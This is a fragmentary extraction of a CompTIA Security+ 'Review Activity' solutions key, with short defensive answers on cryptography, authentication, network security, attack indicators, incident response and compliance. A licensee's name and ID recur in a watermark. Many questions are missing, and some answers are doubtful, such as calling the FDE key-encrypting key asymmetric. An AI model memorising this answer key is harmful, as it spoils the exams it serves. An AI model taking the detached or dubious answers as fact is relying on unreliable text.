3. What extension field is used with a web server certificate to support the identification of the
server by multiple specific subdomain labels?
The subject alternative name (SAN) field. A wildcard certificate will match any subdomain label.
4. What are the potential consequences if a company loses control of a private key?
It puts both data confidentiality and identification and authentication systems at risk. Depending on the key
usage, the key may be used to decrypt data with authorization. The key could also be used to impersonate a
user or computer account.
5. You are advising a customer about encryption for data backup security and the key escrow
services that you offer. How should you explain the risks of key escrow and potential
mitigations?
Escrow refers to archiving the key used to encrypt the customer’s backups with your company as a third
party. The risk is that an insider attack from your company may be able to decrypt the data backups.
This risk can be mitigated by requiring M-of-N access to the escrow keys, reducing the risk of a rogue
administrator.
Either a published certificate revocation list (CRL) or an Online Certificate Status Protocol (OCSP) responder
7. You are providing consultancy to a firm to help them implement smart card authentication to
premises networks and cloud services. What are the main advantages of using an HSM over
server-based key and certificate management services?
A hardware security module (HSM) is optimized for this role and so presents a smaller attack surface. It
is designed to be tamper evident to mitigate against insider threat risks. It is also likely to have a better
implementation of a random number generator, improving the security properties of key material.
14
Review Activity: Cryptographic Solutions
15
1. In an FDE product, what type of cipher is used for a key encrypting key?
Full-disk encryption (FDE) uses a secret symmetric key to perform bulk encryption of a disk. This data
encryption key (DEK) is protected by a Key Encryption Key (KEK). The KEK is an asymmetric cipher (RSA or
ECC) private key.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. True or False? Perfect Forward Secrecy (PFS) ensures that a compromise of a server's private key
will not also put copies of traffic sent to that server in the past at risk of decryption.
True. PFS ensures that ephemeral keys are used to encrypt each session. These keys are destroyed after use.
Diffie-Hellman allows the sender and recipient to derive the same value (the session key) from some other
pre-agreed values. Some of these are exchanged, and some kept private, but there is no way for a snooper
to work out the secret just from the publicly exchanged values. This means session keys can be created
without relying on the server’s private key and that it is easy to generate ephemeral keys that are different
for each session.
4. True or false? It is essential to keep a salt value completely secret to prevent recovery of a
password from its hash.
False. The salt does not have to be kept secret, though it should be generated randomly.
16
Review Activity: Authentication
17
1. Which property of a plaintext password is most effective at defeating a brute force attack?
The length of the password. If the password does not have any complexity (if it is just two dictionary words,
for instance), it may still be vulnerable to a dictionary-based attack. A long password may still be vulnerable if
the output space is small or if the mechanism used to hash the password is faulty.
2. A user maintains a list of commonly used passwords in a file located deep within the computer’s
directory structure. Is this secure password management?
No. This is security by obscurity. The file could probably be easily discovered using search tools.
Enforce password history/block reuse and set a minimum age to prevent users from quickly cycling through
password changes to revert to a preferred phrase.
4. True or false? An account requiring a password, PIN, and smart card is an example of
three-factor authentication.
You can query the location service running on a device or geolocation by IP. You could use location with the
network, based on switch port, wireless network name, virtual LAN (VLAN), or IP subnet.
6. Apart from cost, what would you consider to be the major considerations for evaluating a
biometric recognition technology?
Error rates (false acceptance and false rejection), throughput, and whether users will accept the technology
or reject it as too intrusive or threatening to privacy.
7. True or false? When implementing smart card login, the user’s private key is stored on the smart
card.
True. The smart card implements a cryptoprocessor for secure generation and storage of key and certificate
material.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A one-time password mechanism generates a token that is valid only for a short period (usually 60 seconds),
before it changes again. This can be sent to a registered device or generated by a hard token device. This
sort of two-step verification means that a threat actor cannot simply use the compromised password to
access the user’s account.
18
Review Activity: Authorization
19
1. What is the difference between security group- and role-based permissions management?
A group is simply a container for several user objects. Any organizing principle can be applied. In a role-
based access control system, groups are tightly defined according to job functions. Also, a user should
(logically) only possess the permissions of one role at a time.
2. In a rule-based access control model, can a subject negotiate with the data owner for access
privileges? Why or why not?
This sort of negotiation would not be permitted under rule-based access control; it is a feature of
discretionary access control.
3. What is the process of ensuring accounts are only created for valid users, only assigned the
appropriate privileges, and that the account credentials are known only to the valid user?
Provisioning or onboarding
4. What is the policy that states users should be allocated the minimum sufficient permissions?
Least privilege
5. A threat actor was able to compromise the account of a user whose employment had been
terminated a week earlier. They used this account to access a network share and exfiltrate
important files. What account vulnerability enabled this attack?
While it’s possible that lax password requirements and incorrect privileges may have contributed to
the account compromise, the most glaring problem is that the terminated employee’s account wasn't
deprovisioned. Since the account was no longer being used, it should not have been left active for a threat
actor to exploit.
20
Review Activity: Identity Management
21
A Lightweight Directory Access Protocol (LDAP)-compatible directory stores information about network
resources and users in a format that can be accessed and updated using standard queries.
True
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
3. True or false? In order to create a service ticket, Kerberos passes the user’s password to the
target application server for authentication.
False. Only the KDC verifies the user credential. The Ticket Granting Service (TGS) sends the user’s account
details (SID) to the target application for authorization (allocation of permissions), not authentication.
4. You are consulting with a company about a new approach to authenticating users. You suggest
there could be cost savings and better support for multifactor authentication (MFA) if your
employees create accounts with a cloud provider. That allows the company’s staff to focus on
authorizations and privilege management. What type of service is the cloud vendor performing?
5. You are working on a cloud application that allows users to log on with social media accounts
over the web and from a mobile application. Which protocols would you consider, and which
would you choose as most suitable?
Security Assertion Markup Language (SAML) and OAuth. OAuth offers better support for standard mobile
apps so is probably the best choice.
2
Review Activity: Enterprise Network Architecture
23
1. A company’s network contains client workstations and database servers in the same subnet.
Recently, this has enabled attackers to breach the security of the database servers from a
workstation compromised by phishing malware. The company has improved threat awareness
training and upgraded antivirus software on workstations. What other change will improve the
security of the network’s design, and why?
The network architecture should implement network segmentation to put hosts with the same security
requirements within segregated zones. At layer 2, the workstation and database servers should be placed on
separate switches or placed in separate virtual LANs (VLANs). At layer 3, these segments can be identified as
separate subnets.
2. A company must store archived data with very high confidentiality and integrity requirements
on the same site as its production network systems. What type of architecture will best protect
the security requirements of the archive host?
The host can be physically isolated by configuring it with no networking connections, creating an air-gap.
3. Following a data breach perpetrated by an insider threat actor, a company has relocated its
on-premises servers to a dedicated equipment room. The equipment room has a lockable
door, and the servers are installed to lockable racks. Access to keys is restricted to privileged
administrators and subject to sign-out procedures. True or false? These security principles
reduce the attack surface.
True. The attack surface exists at different network layers and includes physical access. Physically restricting
access to server hardware is an important element in reducing the attack surface and mitigating insider
threat.
The switches must support the IEEE 802.1X standard. The Remote Authentication Dial-In User Service
(RADIUS) protocol and Extensible Authentication Protocol (EAP) framework are used within this, but it is
802.1X that is specific to authenticating when connecting to a switch port (and Wi-Fi access points).
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
5. Two companies are merging and want to consolidate employees at a single site. Neither
company’s on-premises networks have space to add the 100 desktops required. Which
consideration factor does the current architecture model fail to address?
Scalability is the consideration that an architecture should be able to expand to meet additional
requirements or workloads.
24
Review Activity: Network Security Appliances
25
1. True or False? As they protect data at the highest layer of the protocol stack, application-based
firewalls have no basic packet filtering functionality.
False. All firewall types can perform basic packet filtering (by IP address, protocol type, port number,
and so on).
2. A proxy server implements a gateway for employee web and email access and is regularly
monitored for compromise. If any compromise is detected, the proxy must enter a fail state
that prevents further access. What type of fail mode is required?
3. You need to deploy an appliance WAF to protect a web server farm without making any layer
3 addressing changes. Is WAF functionality supported by appliances and, if so, what device
attribute should the appliance support?
A web application firewall (WAF) can be implemented as an appliance or as software running on a general
host. The device must support transparent mode. It could either use layer 2 bridging or a layer 1 inline
(“bump-in-the-wire”) mode.
4. What IPS mechanism can be used to block traffic that violates policy without also blocking the
traffic source?
The intrusion prevention system (IPS) can be configured to reset connections that match rules for traffic that
are not allowed on the network. This halts the potential attack without blocking the source address.
5. True or false? When deploying a non-transparent proxy, clients must be configured with the
proxy address and port.
True. The clients must either be manually configured or use a technology such as proxy auto-configuration
(PAC) to detect the appropriate settings.
The algorithm and metrics that determine which node a load balancer picks to handle a request
26
Review Activity: Secure Communications
27
1. True or false? A TLS VPN can only provide access to web-based network resources.
False. A Transport Layer Security (TLS) VPN uses TLS to encapsulate the private network data and tunnel it
over the network. The private network data could be frames or IP-level packets and is not constrained by
application-layer protocol type.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. What IPsec mode would you use for data confidentiality on a private network?
Transport mode with Encapsulating Security Payload (ESP). Tunnel mode encrypts the IP header information,
but this is unnecessary on a private network. Authentication Header (AH) provides message authentication
and integrity but not confidentiality.
Rather than just providing mutual authentication of the host endpoints, IKEv2 supports a user account
authentication method, such as Extensible Authentication Protocol (EAP).
The server’s public key. This is referred to as the host key. Note that this can only be trusted if the client
trusts that the public key is valid. The client might confirm this manually or using a certificate authority.
5. Server A is configured to forward commands over SSH to a pool of database servers. The
database servers do not accept SSH connections from any other source. What type of
configuration does Server A implement?
Server A is a jump server. A jump server is a specially hardened device designed as a single point of entry for
management and administration traffic for a group of application or database servers in a secure zone. This
is designed to make monitoring and securing connections to the secure zone easier and more reliable.
28
Review Activity: Cloud Infrastructure
29
A solution hosted by a third-party cloud service provider (CSP) and shared between subscribers
(multi-tenant). This sort of cloud solution has the greatest security concerns.
Software that manages virtual machines that has been installed to a guest OS. This is in contrast to a Type I
(or "bare metal") hypervisor, which interfaces directly with the host hardware.
4. 4. What is IaC?
IaC, or Infrastructure as Code, is a software engineering practice that manages computing infrastructure
using machine-readable definition files and is closely related to the use of cloud computing infrastructures.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
31
1. What is a purpose-specific operating system with designs heavily focused on high levels of
stability and processing speed?
Real-Time Operating System (RTOS). RTOS are designed for use in embedded systems and are designed to
provide very specific types of functionality based on implementation.
2. What are the systems control machinery that is used in critical infrastructure, like power
2.
suppliers, water suppliers, health services, telecommunications, and national security services?
Industrial Control Systems (ICS.) ICSs are specialized industrial computers designed to operate
manufacturing and industrial sites. ICS systems are unique in that their failure can often result in significant
physical damage and loss of life.
3. What are some factors contributing to the poor security characteristics of IoT devices?
3.
• IoT devices are designed to be low cost and focus on functionality rather than security.
• There is low awareness among consumers and organizations about the security risks associated with
IoT devices.
4. What is a network security approach that shifts the focus from defending a network’s
boundaries to protecting individual resources and data within the network?
Deperimeterization. This security approach moves away from traditional “inside” and “outside” network
security approaches and focuses on more granular methods of user and device analysis.
32
Review Activity: Asset Management
It ensures that each configurable element within an asset inventory has not diverged from its approved
configuration.
Virtual machines (virtualization). They provide quick, point-in-time copies of a virtual machine’s state.
True. As a security precaution, backup media can be taken offline at the completion of a job to mitigate the
risk of malware corrupting the backup.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
4. You are advising a company about backup requirements for a few dozen application servers
4.
hosting tens of terabytes of data. The company requires online availability of short-term
backups, plus off-site security media and long-term archive storage. The company cannot use a
cloud solution. What type of on-premises storage solution is best suited to the requirement?
The off-site and archive requirements are best met by a tape solution, but the online requirement may need
a RAID array, depending on speed. The requirement is probably not large enough to demand a storage area
network (SAN), but could be provisioned as part of one.
The process of removing sensitive information from storage media to prevent unauthorized access or data
breaches.
34
Review Activity: Redundancy Strategies
35
The maximum tolerable downtime (MTD) metric expresses the availability requirement for a particular
business function.
A scalable system is one that responds to increased workloads by adding resources without exponentially
increasing costs. An elastic system is able to assign or unassign resources as needed to match either an
increased workload or a decreased workload.
3. Which two components are required to ensure power redundancy for a power loss period
3.
An uninterruptible power supply (UPS) is required to provide failover for the initial power loss event, before
switching over to a standby generator to supply power over a longer period.
RAID provides redundancy among a group of disks, so that if one disk were to fail, that data may be
recoverable from the other disks in the array.
36
Review Activity: Physical Security
37
Lighting is one of the most effective deterrents. Any highly visible security control (guards, fences, dogs,
barricades, CCTV, signage, and so on) will act as a deterrent.
One type of proximity reader allows a lock to be operated by a contactless smart card. Proximity sensors can
also be used to track objects via RFID tags.
3. 3. What type of sensor detects changes in heat patterns caused by moving objects?
Infrared
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
4. What is a bollard?
4.
A short vertical post typically made of steel, concrete, or other similarly durable material and designed to
restrict vehicular traffic into pedestrian areas.
38
Review Activity: Device and OS Vulnerabilities
39
1. You are recommending that a business owner invest in patch management controls for PCs and
laptops. What is the main risk from weak patch management procedures on such devices?
Vulnerabilities in the OS and applications software such as web browsers and document readers or in PC
and adapter firmware can allow threat actors to run malware and gain a foothold on the network.
2. You are advising a business owner on security for a PC running Windows 7. The PC runs process
2.
management software that the owner cannot run on Windows 11. What are the risks arising
from this, and how can they be mitigated?
Windows 7 is a legacy platform that is no longer receiving security updates. This means that patch
management cannot be used to reduce risks from software vulnerabilities. The workstation should be
isolated from other systems to reduce the risk of compromise.
3. As a security solution provider, you are compiling a checklist for your customers to assess
3.
potential vulnerabilities. What vulnerability do the following items relate to? Default settings,
Unsecured root accounts, Open ports and services, Unsecure protocols, Weak encryption,
Errors.
41
1. Your log shows that the Notepad process on a workstation running as the local administrator
account has started an unknown process on an application server running as the SYSTEM
account. What type of attack(s) are represented in this intrusion event?
The Notepad process has been compromised, possibly using buffer overflow or a DLL/process injection
attack. The threat actor has then performed lateral movement and privilege escalation, gaining higher
privileges through remote code execution on the application server.
Malicious updates describe updates typically downloaded from the trusted hardware or software vendor
that include malware. This is a result of the vendor’s environment being exploited.
3. What type of attack is focused on exploiting the database access provided to a web application?
3.
SQL injection. SQLi attacks manipulate the way web applications handle inputs to gain access to protected
resources stored in a database or manipulate web application behavior.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
43
1. You have received an urgent threat advisory and need to configure a network vulnerability scan
to check for the presence of a related CVE on your network. What configuration check should
you make in the vulnerability scanning software before running the scan?
Verify that the vulnerability feed/plug-in/test has been updated with the specific CVE that you need to
test for.
2. Your CEO wants to know if the company’s threat intelligence platform makes effective use of
2.
Open-source intelligence (OSINT) is cybersecurity-relevant information harvested from public websites and
data records. In terms of threat intelligence specifically, it refers to research and data feeds that are made
publicly available.
3. A small company that you provide security consulting support to has resisted investing in an
3.
event management and threat intelligence platform. The CEO has become concerned about an
APT risk known to target supply chains within the company’s industry sector and wants you to
scan their systems for any sign that they have been targeted already. What are the additional
challenges of meeting this request, given the lack of investment?
Collecting network traffic and log data from multiple sources and then analyzing it manually will require
many hours of analyst time. The use of threat feeds and intelligence fusion to automate parts of this analysis
effort would enable a much swifter response.
45
2. A vulnerability scan reports that a CVE associated with CentOS Linux is present on a host, but
2.
you have established that the host is not running CentOS. What type of scanning error event
is this?
False positive
3. This type of protection can provide financial protection in case of a security breach resulting
3.
from a vulnerability.
Cybersecurity insurance. These policies are designed to cover a majority of the expenses related to
remediating and recovering from a cyber incident.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
46
Review Activity: Network Security Baselines
47
This is a type of group authentication used when the infrastructure for authenticating securely (via RADIUS,
for instance) is not available. The system depends on the strength of the passphrase used for the key.
No, an enterprise network will use RADIUS authentication. WPS uses PSK, and there are weaknesses in the
protocol.
3. You want to deploy a wireless network where only clients with domain-issued digital certificates
3.
EAP-TLS is the best choice because it requires that both server and client be installed with valid certificates.
Some network access control (NAC) solutions perform host health checks via a local agent, running on
the host. A dissolvable agent is one that is executed in the host’s memory and CPU but not installed to a
local disk.
49
By using two firewalls (external and internal) around a screened subnet, or by using a triple-homed firewall
(one with three network interfaces)
Installing definition/signature updates and removing definitions that are not relevant to the hosts or services
running on your network.
4. What is the principal risk of deploying an intrusion prevention system with behavior-based
4.
detection?
Behavior-based detection can exhibit high false positive rates, where legitimate activity is wrongly identified
as malicious. With automatic prevention, this will block many legitimate users and hosts from the network,
causing availability and support issues.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
50
Review Activity: Endpoint Security
51
A basic principle of security is to run only services that are needed. A hardened system is configured to
perform a role as client or application server with the minimal possible attack surface in terms of interfaces,
ports, services, storage, system/registry permissions, lack of security controls, and vulnerabilities.
2. True or false? Only Microsoft’s operating systems and applications require security patches.
2.
False. Any vendor’s or open source software or firmware can contain vulnerabilities that need patching.
3. Why are OS-enforced file access controls not sufficient in the event of the loss or theft of a
3.
The disk (or other storage) could be attached to a foreign system, and the administrator could take
ownership of the files. File-level, full disk encryption (FDE), or self-encrypting drives (SED) mitigate this by
requiring the presence of the user’s decryption key to read the data.
52
Review Activity: Mobile Device Hardening
53
1. What type of deployment model(s) allow users to select the mobile device make and model?
Bring your own device (BYOD) and choose your own device (CYOD)
2. Company policy requires that you ensure your smartphone is secured from unauthorized access
in case it is lost or stolen. To prevent someone from accessing data on the device immediately
after it has been turned on, what security control should be used?
Screen lock
3. True or false? A maliciously designed USB battery charger could be used to exploit a mobile
device on connection.
True. Though the vector is known to the mobile OS and handset vendors, the exploit often requires user
interaction.
4. Why might enforcement policies be used to prevent USB tethering when a smartphone is
brought to the workplace?
This would allow a PC or laptop to connect to the Internet via the smartphone’s cellular data connection. This
could be used to evade network security mechanisms, such as data loss prevention or content filtering.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
1. What type of attack against HTTPS aims to force the server to negotiate weak ciphers?
A downgrade attack
2. When using S/MIME, which key is used to protect the confidentiality of a message?
2.
The recipient’s public key (principally). The public key is used to encrypt a symmetric session key, and (for
performance reasons) the session key does the actual data encoding. The session key and, therefore, the
message text can then only be recovered by the recipient, who uses the linked private key to decrypt it.
Secure Shell (SSH) provides the same functionality as TELNET and incorporates encryption protections by
default.
4. True or false? DNSSEC depends on a chain of trust from the root servers down.
4.
True. The authoritative server for the zone creates a "package" of resource records (called an RRset) signed
with a private key (the Zone Signing Key). When another server requests a secure record exchange, the
authoritative server returns the package along with its public key, which can be used to verify the signature.
57
1. What type of programming practice defends against injection-style attacks, such as inserting
SQL commands into a database application from a site search form?
Input validation provides some mitigation against this type of input being passed to an application via a user
form. Output encoding could provide another layer of protection by checking that the query that the script
passes to the database is safe.
A default error message might reveal platform information and the workings of the code to an attacker.
Static code analysis is designed to inspect software at the source-code level to identify and report on
insecure coding practices. Static code analysis tools are often incorporated into software development
environments to automatically flag insecure code and encourage developers to focus on secure
development practices.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
58
Review Activity: Incident Response
59
1. What are the seven processes in the CompTIA incident response lifecycle?
2. True or false? The "first responder" is whoever first reports an incident to the CIRT.
False. The first responder would be the member of the computer incident response team (CIRT) to handle
the report.
3. True or false? It is important to publish all security alerts to all members of staff.
False. Security alerts should be sent to those able to deal with them at a given level of security awareness
and on a need-to-know basis.
4. You are providing security consultancy to assist a company with improving incident response
procedures. The business manager wants to know why an out-of-band contact mechanism for
responders is necessary. What do you say?
The response team needs a secure channel to communicate over without alerting the threat actor. There
may also be availability issues with the main communication network if it has been affected by the incident.
5. Your consultancy includes a training segment. What type of incident response exercise will best
represent a practical incident handling scenario?
A simulation exercise creates an actual intrusion scenario, with a red team performing the intrusion and a
blue team attempting to identify, contain, and eradicate it.
60
Review Activity: Digital Forensics
61
The evidence cannot be seen directly but must be interpreted so the validity of the interpreting process must
be unquestionable.
2. You’ve fulfilled your role in the forensic process, and now you plan on handing the evidence
over to an analysis team. What important process should you observe during this transition,
and why?
It’s important to uphold a record of how evidence is handled in a chain of custody. The chain of custody will
help verify that everyone who handled the evidence is accounted for, including when the evidence was in
each person’s custody. This is an important tool in validating the evidence’s integrity.
3. True or false? To ensure evidence integrity, you must make a hash of the media before making
an image.
True
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
4. You must recover the contents of the ARP cache as vital evidence of an on-path attack. Should
you shut down the PC and image the hard drive to preserve it?
No, the ARP cache is stored in memory and will be discarded when the computer is powered off. You can
either dump the system memory or run the ARP utility and make a screenshot. In either case, make sure that
you record the process and explain your actions.
62
Review Activity: Data Sources
63
1. Your manager has asked you to prepare a summary of the usefulness of different kinds of log
data. You have sections for firewall, application, OS-specific security, IPS/IDS, and network logs
plus metadata. Following the CompTIA Security+ exam objectives, which additional log data
type should you cover?
Endpoint logs. These are typically security logs from detection suites that perform antivirus scanning and
enforce policies.
2. You must assess a security monitoring suite for its dashboard functionality. What is the general
use of dashboards?
A dashboard provides a console to work from for day-to-day incident response. It provides a summary
of information drawn from the underlying data sources to support some work task. Most tools allow the
configuration of different dashboards for different tasks. A dashboard can show uncategorized events and
visualizations of key metrics and status indicators.
3. True or false? It is not possible to set custom file system audit settings when using security log
data.
False. File system audit settings are always configurable. This type of auditing can generate a large amount
of data, so the appropriate settings are often different from one context to another.
4. What type of data source supports frame-by-frame analysis of an event that generated an
IDS alert?
Packet capture means that the frames of network traffic that triggered an intrusion detection system (IDS)
alert are recorded and stored in the monitoring system. The analyst can pivot from the alert to view the
frames in a protocol analyzer.
64
Review Activity: Alerting and Monitoring Tools
65
Security information and event management (SIEM) products aggregate IDS alerts and host logs from
multiple sources, then perform correlation analysis on the observables collected to identify indicators of
compromise and alert administrators to potential incidents.
2. What is the difference between a sensor and a collector, in the context of SIEM?
A SIEM collector receives log data from a remote host and parses it into a standard format that can be
recorded within the SIEM and interpreted for event correlation. A sensor (or sniffer) copies data frames
from the network, using either a mirror port on a switch or some type of media tap.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
3. Your company has implemented a SIEM but found that there is no parser for logs generated by
the network’s UTM gateway. Why is a parser necessary?
Security information and event management (SIEM) aggregates data sources from multiple hosts and
appliances, including unified threat management (UTM). A parser translates the event attributes and data
used by the UTM to standard fields in the SIEM’s event database. This normalization process is necessary for
the correlation of event data generated by different sources.
4. Your manager has asked you to prepare a summary of the activities that support alerting and
monitoring. You have sections for log aggregation, alerting, scanning, reporting, and alert
response and remediation/validation (including quarantine and alert tuning). Following the
CompTIA Security+ exam objectives, which additional activity should you cover?
Archiving means that there is a store of event data that can be called upon for retrospective investigations,
such as threat hunting. Archiving also meets compliance requirements to preserve information. As the
volume of live data can pose problems for SIEM performance, archived data is often moved to a separate
long-term storage area.
5. You are supporting a SIEM deployment at a customer’s location. The customer wants to know
whether flow records can be ingested. What type of monitoring tool generates flow records?
Flow records are generated by NetFlow or IP Flow Information Export (IPFIX) probes. A flow record is data
that matches a flow label, which is a particular combination of keys (IP endpoints and protocol/port types).
6
Review Activity: Malware Attack Indicators
67
1. You are troubleshooting a user’s workstation. At the computer, an app window displays on the
screen claiming that all of your files are encrypted. The app window demands that you make an
anonymous payment if you ever want to recover your data. What type of malware has infected
the computer?
This is some type of ransomware, but you will have to investigate resource inaccessibility to determine
whether it is actually crypto-ransomware, or a "scareware" variant that is easier to remediate.
2. You are recommending different antivirus products to the CEO of a small travel services firm.
2.
The CEO is confused because they had heard that Trojans represent the biggest threat to
computer security these days. What explanation can you give?
While antivirus (A-V) scanner remains a popular marketing description, all current security products worthy
of consideration will try to provide protection against a full range of malware and bloatware threats.
3. You are writing a security awareness blog for company CEOs subscribed to your threat platform.
3.
Why are backdoors and Trojans different ways of classifying and identifying malware risks?
A Trojan means a malicious program masquerading as something else; a backdoor is a covert means of
accessing a host or network. A Trojan need not necessarily operate a backdoor, and a backdoor can be
established by exploits other than using Trojans. The term "remote access Trojan (RAT)" is used for the
specific combination of Trojan and backdoor.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
4. You are investigating a business email compromise (BEC) incident. The email account of a
4.
developer has been accessed remotely over webmail. Investigating the developer’s workstation
finds no indication of a malicious process, but you do locate an unknown USB extension
device attached to one of the rear ports. Is this the most likely attack vector, and what type of
malware would it implement?
It is likely that the USB device implements a hardware-based keylogger. This would not necessarily require
any malware to be installed or leave any trace in the file system.
5. A user’s computer is performing extremely slowly. Upon investigating, you find that a process
named n0tepad.exe is utilizing the CPU at rates of 80%–90%. This is accompanied by continual
small disk reads and writes to a temporary folder. Should you suspect malware infection, and is
any particular class of malware indicated?
Yes, this is malware as the process name is trying to masquerade as a legitimate process. It is not possible
to conclusively determine the type without more investigation, but you might initially suspect a cryptominer/
cryptojacker.
68
Review Activity: Network Attack Indicators
69
Where the attacker spoofs the victim’s IP in requests to several reflecting servers (often DNS or NTP servers).
The attacker crafts the request so that the reflecting servers respond to the victim’s IP with a large message,
overwhelming the victim’s bandwidth.
Most attacks depend on overwhelming the victim. This typically requires a large number of hosts, or bots.
3. Users in a particular wireless network segment are complaining that websites are frequently
slow to load or unavailable or filled with advertising. On investigation, each host in the segment
is set to use an unauthorized DNS resolver. Which attack type is the likely cause for this?
The hosts are likely to be receiving their configuration from a malicious Dynamic Host Configuration Protocol
(DHCP) server. This is likely to have been achieved via an on-path attack, such as a rogue access point or evil
twin access point.
4. The security log on a domain controller has recorded numerous unsuccessful attempts to read
the NTDS.DIT file by three different client workstation computer accounts. What specific type of
attack is this a precursor for?
NTDS.DIT stores credentials for an Active Directory network. Obtaining a copy of it allows a threat actor to
perpetrate offline password attacks. An offline password attack could use brute force, dictionary, or hybrid
cracking techniques.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
70
Review Activity: Application Attack Indicators
71
The attacker captures some data, such as a cookie, used to log on or start a session legitimately. The attacker
then resends the captured data to re-enable the connection.
2. You are reviewing access logs on a web server and notice repeated requests for URLs containing
the strings %3C and %3E. Is this an event that should be investigated further, and why?
Those strings represent percent encoding (for HTML tag delimiters < and >). This could be an injection attack
so should be investigated.
3. You are improving back-end database security to ensure that requests deriving from front-end
web servers are authenticated. What general class of attack is this designed to mitigate?
Server-side request forgery (SSRF) causes a public server to make an arbitrary request to a back-end server.
This is made much harder if the threat actor has to defeat an authentication or authorization mechanism
between the web server and the database server.
4. A technician is seeing high volumes of 403 Forbidden errors in a log. What type of network
appliance or server is producing these logs?
403 Forbidden is an HTTP status code, so most likely a web server. Another possibility is a web proxy or
gateway.
73
1. This policy outlines the acceptable ways in which network and computer systems may be used.
Change management describes the policies and procedures dictating how changes can be made in the
environment. Configuration management describes the technical tools used to manage, enforce, and deploy
changes to software and endpoints.
3. What are a few examples of the types of capabilities that may be included in a password
standard?
Approved hashing algorithms, password salting methods, secure password transmission methods, password
reset methods, password manager requirements.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
74
Review Activity: Change Management
75
A backout plan is a contingency plan for reversing changes and returning systems and software to their
original state if the implementation plan fails.
System dependencies describe the interconnection of systems and software. Dependencies may cause an
otherwise simple change to have severe and widespread impacts attributed to the fact that a single changed
component may break functionality in other systems.
76
Review Activity: Automation and Orchestration
APIs are the enabling feature allowing different platforms and tools to interact with each other. APIs allow
security tools to work together and perform rule-based actions to perform tasks previously handled by
security analysts.
Operator fatigue refers to the mental exhaustion experienced by cybersecurity professionals due to their
work’s continuous, high-intensity nature.
3. Identify a few of the potential issues associated with automation and orchestration.
Complexity, cost, single point of failure, technical debt, and ongoing support burdens
79
1. What metric(s) could be used to make a quantitative calculation of risk due to a specific threat
1.
Single Loss Expectancy (SLE) or Annual Loss Expectancy (ALE). ALE is SLE multiplied by ARO (annual rate of
occurrence).
Risk transference
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A document highlighting the results of risk assessments in an easily comprehensible format (such as a heat
map or "traffic light" grid). Its purpose is for department managers and technicians to understand risks
associated with the workflows that they manage.
80
Review Activity: Vendor Management Concepts
81
1. This describes a contractual provision that grants an organization the authority to conduct
audits or assessments of vendor operational practices, information systems, and security
controls.
A right-to-audit clause. The right-to-audit clause supports vendor assessment practices by allowing
organizations to validate and verify the vendor’s compliance with contractual obligations, security
standards, and regulatory requirements.
2. 2. Describe the concept of conflict of interest in relationship with vendor management practices.
Answers will vary. A conflict of interest arises when an individual or organization has competing interests
or obligations that could compromise their ability to act objectively, impartially, or in the best interest of
another party.
3. This legal contract is a nonbinding agreement that outlines the intentions, shared goals, and
3.
4. This legal document establishes clear guidelines for the vendor’s behavior, activities, and access
4.
to sensitive information.
Rules of engagement. These rules define the parameters and expectations for vendor relationships. These
rules outline the responsibilities, communication methods, reporting mechanisms, security requirements,
and compliance obligations that vendors must adhere to.
82
Review Activity: Penetration Testing Concepts
83
1. A website owner wants to evaluate whether the site security mitigates risks from criminal
syndicates, assuming no risk of insider threat. What type of penetration testing engagement
will most closely simulate this adversary capability and resources?
A threat actor has no privileged information about the website configuration or security controls. This is
simulated in an unknown environment penetration test engagement.
2. Why should an Internet service provider (ISP) be informed before pen testing on a hosted
2.
ISPs monitor their networks for suspicious traffic and may block the test attempts. The pen test may
also involve equipment owned and operated by the ISP and not authorized to be included as part of the
assessment.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
practices, and adherence to established criteria against predetermined metrics and measures.
Self-assessments. Self-assessments help identify strengths, weaknesses, and areas for improvement,
enabling individuals or organizations to take proactive measures to enhance their effectiveness and
outcomes.
Answers will vary. The importance of independent third-party audits lies in their ability to offer an external
perspective, free from any conflicts of interest or bias.
85
1. What range of information classifications could you implement in a data labeling project?
One set of tags could indicate the degree of confidentiality (public, confidential/secret, or critical/top secret).
Another tagging schema could distinguish proprietary from private/sensitive personal data.
Privacy information is any data that could be used to identify, contact, or locate an individual.
3. You are reviewing security and privacy issues relating to a membership database for a
3.
hobbyist site with a global audience. The site currently collects account details with no further
information. What should be added to be in compliance with data protection regulations?
The site should add a privacy notice explaining the purposes the personal information is collected and used
for. The form should provide a means for the user to give explicit and informed consent to this privacy
notice.
4. You are preparing a briefing paper for customers on the organizational consequences of data
4.
and privacy breaches. You have completed sections for reputation damage, identity theft, and
IP theft. Following the CompTIA Security+ objectives, what other section should you add?
Data and privacy breaches can lead legislators or regulators to impose fines. In some cases, these fines can
be substantial (calculated as a percentage of turnover).
5. 5. This state means that the data is in some sort of persistent storage media.
Data at rest. In this state, it is usually possible to encrypt the data, using techniques such as whole disk
encryption, database encryption, and file- or folder-level encryption.
